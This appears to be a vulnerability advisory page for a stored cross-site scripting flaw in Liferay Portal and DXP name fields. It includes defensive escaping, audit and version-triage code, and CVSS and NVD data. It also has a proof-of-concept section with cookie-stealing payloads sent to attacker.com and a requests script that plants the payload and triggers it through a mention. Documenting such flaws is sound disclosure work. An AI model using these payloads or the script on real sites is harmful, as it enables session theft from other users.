Security Vulnerability Report
CVE-2025-62246 CVSS 5.4 MEDIUM

CVE-2025-62246

Published: 2025-10-13 21:15:35
Last Modified: 2025-12-12 20:43:48

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a user's first, middle or last name text field to (1) the page comments widget, (2) blog entry comments, (3) document and media document comments, (4) message board messages, (5) wiki page comments or (6) other widgets/apps that support mentions. The attacker needs only a low-privileged account that can edit its own profile; the payload is stored once in the name field and then replayed, unescaped, wherever another user's content @mentions that account.
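To make the bug concrete, here is an added example (not Liferay's code) that models how a mentions widget turns a stored display name into markup: a vulnerable renderer that interpolates the name directly, the escaped version beside it, and an audit helper that flags name fields already holding markup, which is the clean-up step a patch alone does not perform. The user records, screen names and the `/web/<screenName>` link shape are constructed for illustration.

```python
import html
import re

# Constructed sample user records (not real Liferay data). User 1002 carries a
# payload of the kind the advisory describes, stored in the first-name field.
USERS = {
    1001: {"screenName": "alice", "firstName": "Alice", "middleName": "", "lastName": "Doe"},
    1002: {"screenName": "mallory", "firstName": "<img src=x onerror=alert(1)>",
           "middleName": "", "lastName": "Malicious"},
}

MENTION_RE = re.compile(r"@(\w+)")
# Crude markup detector for auditing stored names: a tag opener, an on* event
# handler assignment, or a javascript: URL.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def full_name(user):
    return " ".join(p for p in (user["firstName"], user["middleName"], user["lastName"]) if p)


def render_mention_vulnerable(user):
    """The bug: the stored display name is interpolated straight into markup."""
    return f'<a href="/web/{user["screenName"]}">{full_name(user)}</a>'


def render_mention_fixed(user):
    """The fix: every user-controlled value is escaped for the HTML context it lands in."""
    return '<a href="/web/{}">{}</a>'.format(
        html.escape(user["screenName"], quote=True),
        html.escape(full_name(user), quote=True),
    )


def expand_mentions(body, users, render):
    """Escape the comment body, then replace each @screenName with its rendered mention."""
    by_screen_name = {u["screenName"]: u for u in users.values()}

    def replace(match):
        user = by_screen_name.get(match.group(1))
        return render(user) if user else match.group(0)

    return MENTION_RE.sub(replace, html.escape(body, quote=True))


def audit_name_fields(users):
    """Post-patch clean-up: list (userId, field, value) for name fields that contain markup."""
    hits = []
    for user_id, user in users.items():
        for field in ("firstName", "middleName", "lastName"):
            if MARKUP_RE.search(user[field]):
                hits.append((user_id, field, user[field]))
    return hits


if __name__ == "__main__":
    body = "Hey @mallory check this out!"
    print("vulnerable:", expand_mentions(body, USERS, render_mention_vulnerable))
    print("fixed:     ", expand_mentions(body, USERS, render_mention_fixed))
    print("audit:     ", audit_name_fields(USERS))
```

The escaped output still shows the attacker's chosen text, so the audit list is what an administrator would use to reset names after applying the vendor fix; escaping stops execution but does not remove the stored payload.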

CVSS Details

CVSS Score (v3.1, primary)
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS 4.0 Score (secondary)
4.8 MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

The attacker needs low privileges (any authenticated account) and the victim must view the content containing the mention; scope is changed in v3.1 because the script runs in other users' browsers rather than in the attacker's own session.

Configurations (Affected Products)

cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE (7.1.0 up to and including 7.4.3.111; fixed in 7.4.3.112)
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (2023.Q3.1 up to and including 2023.Q3.8; fixed in 2023.Q3.9)
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (2023.Q4.0 up to and including 2023.Q4.5; fixed in 2023.Q4.6)
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (7.4 GA up to and including update 92)
Liferay Portal 7.4.0 - 7.4.3.111
Liferay Portal, older unsupported versions
Liferay DXP 2023.Q4.0 - 2023.Q4.5
Liferay DXP 2023.Q3.1 - 2023.Q3.8
Liferay DXP 7.4 GA - update 92
Liferay DXP, older unsupported versions
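As an added example, not part of the advisory, the following helper turns the ranges above into a version check that can be run over a host inventory. Version strings such as 7.4.3.111 and 2023.Q4.5 follow the forms used on this page; the 7.4.13-u92 notation for DXP 7.4 updates, the reading of "through update 92" as "later updates are fixed", and the sample inventory are assumptions made for the example.

```python
import re

# Version formats handled. The DXP 7.4 "7.4.13-u92" update notation is an
# assumption about how such builds are reported; adjust if your inventory differs.
PORTAL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)$")                  # 7.4.3.111
QUARTERLY_RE = re.compile(r"^(\d{4})\.Q([1-4])\.(\d+)$", re.IGNORECASE)  # 2023.Q4.5
DXP74_RE = re.compile(r"^7\.4(?:\.\d+)?(?:-u(\d+))?$", re.IGNORECASE)   # 7.4.13 (GA) or 7.4.13-u92

# Ranges taken from the advisory text and the CPE match data on this page.
PORTAL_FIXED = (7, 4, 3, 112)                                 # first unaffected Portal build
QUARTERLY_AFFECTED = {(2023, 3): (1, 8), (2023, 4): (0, 5)}   # (year, quarter) -> (min, max) patch
DXP74_LAST_AFFECTED_UPDATE = 92                               # "7.4 GA through update 92"


def is_affected(product, version):
    """True when the build falls in an affected range; ValueError on an unrecognised format."""
    product = product.lower()
    version = version.strip()
    if product == "portal":
        m = PORTAL_RE.match(version)
        if not m:
            raise ValueError(f"unrecognised Liferay Portal version: {version!r}")
        # Any build before the fix counts, which also covers the "older unsupported versions".
        return tuple(int(x) for x in m.groups()) < PORTAL_FIXED
    if product == "dxp":
        m = QUARTERLY_RE.match(version)
        if m:
            year, quarter, patch = (int(x) for x in m.groups())
            bounds = QUARTERLY_AFFECTED.get((year, quarter))
            return bounds is not None and bounds[0] <= patch <= bounds[1]
        m = DXP74_RE.match(version)
        if m:
            update = int(m.group(1)) if m.group(1) else 0   # no suffix means GA
            return update <= DXP74_LAST_AFFECTED_UPDATE
        raise ValueError(f"unrecognised Liferay DXP version: {version!r}")
    raise ValueError(f"unknown product: {product!r}")


def triage(inventory):
    """Return the hosts from [(host, product, version), ...] that still need the fix."""
    return [host for host, product, version in inventory if is_affected(product, version)]


# Constructed inventory for demonstration.
INVENTORY = [
    ("intranet-01", "portal", "7.4.3.111"),
    ("intranet-02", "portal", "7.4.3.112"),
    ("dxp-prod", "dxp", "2023.Q4.5"),
    ("dxp-stage", "dxp", "2023.Q4.6"),
    ("dxp-legacy", "dxp", "7.4.13-u92"),
    ("dxp-legacy-2", "dxp", "7.4.13-u93"),
]

if __name__ == "__main__":
    for host in triage(INVENTORY):
        print("affected:", host)
```

Unknown version strings raise rather than silently returning "not affected", so a malformed inventory entry cannot hide a vulnerable host.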

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62246 - Liferay Portal/DXP stored XSS via user name fields.
# A low-privileged authenticated user stores a payload in their own first,
# middle or last name. Any widget that renders an @mention of that user
# (page, blog, document and wiki comments, message board posts) writes the
# name into the page unescaped, so the payload runs for every viewer.
#
# Step 1: example payloads for the profile name fields (one field is enough)
#   First name:  <img src=x onerror="alert('XSS via First Name');document.location='https://attacker.com/steal?c='+document.cookie">
#   Middle name: <svg/onload="fetch('https://attacker.com/log?data='+btoa(document.cookie))">
#   Last name:   <script>new Image().src='https://attacker.com/x?'+document.cookie;</script>
# Step 2: mention the attacker account (@screenName) in any widget that supports mentions.
# Step 3: when a victim views the content containing the mention, the payload
#         executes in the victim's browser context.
#
# Automated version using requests. The portlet parameter names follow Liferay's
# namespacing convention, but the action URLs below are placeholders: copy the
# real form action URLs from the target's own login, profile and message board
# forms before running this.
import re
import requests

TARGET_URL = "https://liferay.example.com"
USERNAME = "attacker"
PASSWORD = "password123"

session = requests.Session()


def get_p_auth(url):
    # Liferay rejects state-changing POSTs without the per-session CSRF token,
    # which pages expose in inline script as Liferay.authToken.
    match = re.search(r'Liferay\.authToken\s*=\s*["\']([^"\']+)', session.get(url).text)
    return match.group(1) if match else ""


# Login
login_data = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME,
    "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD,
    "p_auth": get_p_auth(f"{TARGET_URL}/web/guest/home"),
}
session.post(f"{TARGET_URL}/web/guest/home", data=login_data)

# Update the attacker's own profile with the payload in a name field
profile_data = {
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_mvcPath": "/users_admin/edit_user.jsp",
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_firstName": "<img src=x onerror=alert(1)>",
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_middleName": "",
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_lastName": "Malicious",
    "p_auth": get_p_auth(f"{TARGET_URL}/group/control_panel/manage"),
}
session.post(f"{TARGET_URL}/group/control_panel/manage", data=profile_data)

# Post a message board reply that @mentions the attacker account to trigger the XSS
comment_data = {
    "_com_liferay_message_boards_web_portlet_MBPortlet_cmd": "addMessage",
    "_com_liferay_message_boards_web_portlet_MBPortlet_inputSubject": "Hello",
    "_com_liferay_message_boards_web_portlet_MBPortlet_inputBody": f"Hey @{USERNAME} check this out!",
    "_com_liferay_message_boards_web_portlet_MBPortlet_postReply": "true",
    "p_auth": get_p_auth(f"{TARGET_URL}/message-boards"),
}
response = session.post(f"{TARGET_URL}/message-boards", data=comment_data)
print("mention posted, HTTP", response.status_code)

References

https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62246 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62246", "sourceIdentifier": "[email protected]", "published": "2025-10-13T21:15:35.260", "lastModified": "2025-12-12T20:43:47.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a user’s first, middle or last name text field to (1) page comments widget, (2) blog entry comments, (3) document and media document comments, (4) message board messages, (5) wiki page comments or (6) other widgets/apps that supports mentions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1.0", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "CEA3CAD9-1E84-4DF9-A232-997BA0A2C654"}]}]}], 
"references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62246", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}